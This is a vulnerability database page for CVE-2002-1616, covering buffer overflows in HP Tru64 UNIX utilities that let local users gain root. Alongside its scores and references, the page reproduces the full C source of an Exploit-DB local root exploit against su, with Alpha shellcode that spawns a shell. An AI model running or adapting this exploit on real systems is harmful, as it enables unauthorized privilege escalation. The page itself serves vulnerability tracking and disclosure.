CVE-2002-1616 : Detail

CVE-2002-1616

0.25%V3
Local
2005-03-25
04h00 +00:00
2017-07-10
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple buffer overflows in HP Tru64 UNIX 5.1a, 5.1, 5.0a, 4.0g, and 4.0f allow local users to gain root privileges via (1) su, (2) chsh, (3) passwd, (4) chfn, (5) dxchpwd, and (6) libc.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 259

Publication date : 2001-01-25 23h00 +00:00
Author : K2
EDB Verified : Yes

/* Copyright (c) 2000 ADM */ /* All Rights Reserved */ /* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM */ /* The copyright notice above does not evidence any */ /* actual or intended publication of such source code. */ /* */ /* Title: Tru64 5 su */ /* Tested under: Tru64 5A (OSF/1) */ /* By: K2 (thx horizon,lamont :) */ /* Use: cc -o tru64-su tru64-su.c */ /* Issues: Tru64 re-implmented non-exec patch, */ /* I'm working on non-exec alpha technique */ /* so it will only work if, */ /* do this -> "sysconfig -q proc executable_stack" */ /* and see if -> "executable_stack = 1" */ /* else? */ /* wait for new alpha non-exec stack exploit */ /* */ #include <unistd.h> #include <stdlib.h> #include <strings.h> #include <string.h> #include <stdio.h> #define BUFSIZE 8241 char *nop = "\x1f\x04\xff\x47"; char *retaddr = "\xe4\xc0\xff\x1f\x01\x00\x00\x00"; /* lamont's shellcode */ int rawcode[] = { 0x2230fec4, /* subq $16,0x13c,$17 [2000]*/ 0x47ff0412, /* clr $18 [2000]*/ 0x42509532, /* subq $18, 0x84 [2000]*/ 0x239fffff, /* xor $18, 0xffffffff, $18 */ 0x4b84169c, 0x465c0812, 0xb2510134, /* stl $18, 0x134($17)[2000]*/ 0x265cff98, /* lda $18, 0xff978cd0[2000]*/ 0x22528cd1, 0x465c0812, /* xor $18, 0xffffffff, $18 */ 0xb2510140, /* stl $18, 0x140($17)[2000]*/ 0xb6110148, /* stq $16,0x148($17) [2000]*/ 0xb7f10150, /* stq $31,0x150($17) [2000]*/ 0x22310148, /* addq $17,0x148,$17 [2000]*/ 0x225f013a, /* ldil $18,0x13a [2000]*/ 0x425ff520, /* subq $18,0xff,$0 [2000]*/ 0x47ff0412, /* clr $18 [2000]*/ 0xffffffff, /* call_pal 0x83 [2000]*/ 0xd21fffed, /* bsr $16,$l1 ENTRY */ 0x6e69622f, /* .ascii "/bin" [2000]*/ /* .ascii "/sh\0" is generated */ }; int main(int argc, char **argv) { char buf[BUFSIZE+4]; char *env[2]; char *cp,*rc; int i; if(argc > 1) retaddr[0]+=atoi(argv[1]); memset(&buf,'A',BUFSIZE-8); cp=(char *) &(buf[BUFSIZE-8]); for (i=0;i<8;i++) *cp++=retaddr[i]; rc=(char *)rawcode; cp=buf; for(i=0;i<8;i++) *cp++ = 0x6e; for(i=0;i<72;i++) *cp++ = rc[i]; for(i=0;i<320;i++) *cp++ = nop[i % 4]; *cp++=rc[72]-80; for(i=1;i<8;i++) *cp++ = rc[i+72]; env[1]=NULL; execle("/usr/bin/su","su",buf, NULL,env); return(0); } // milw0rm.com [2001-01-26]

Products Mentioned

Configuraton 0

Hp>>Tru64 >> Version 4.0f

Hp>>Tru64 >> Version 4.0g

Hp>>Tru64 >> Version 5.0a

Hp>>Tru64 >> Version 5.1

Hp>>Tru64 >> Version 5.1af

References

http://www.kb.cert.org/vuls/id/177067
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.kb.cert.org/vuls/id/193347
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/5382
Tags : vdb-entry, x_refsource_BID
http://www.securityfocus.com/bid/5381
Tags : vdb-entry, x_refsource_BID
http://www.kb.cert.org/vuls/id/671627
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/5379
Tags : vdb-entry, x_refsource_BID
http://www.kb.cert.org/vuls/id/137555
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/5380
Tags : vdb-entry, x_refsource_BID
http://www.securityfocus.com/archive/1/290115
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.kb.cert.org/vuls/id/864083
Tags : third-party-advisory, x_refsource_CERT-VN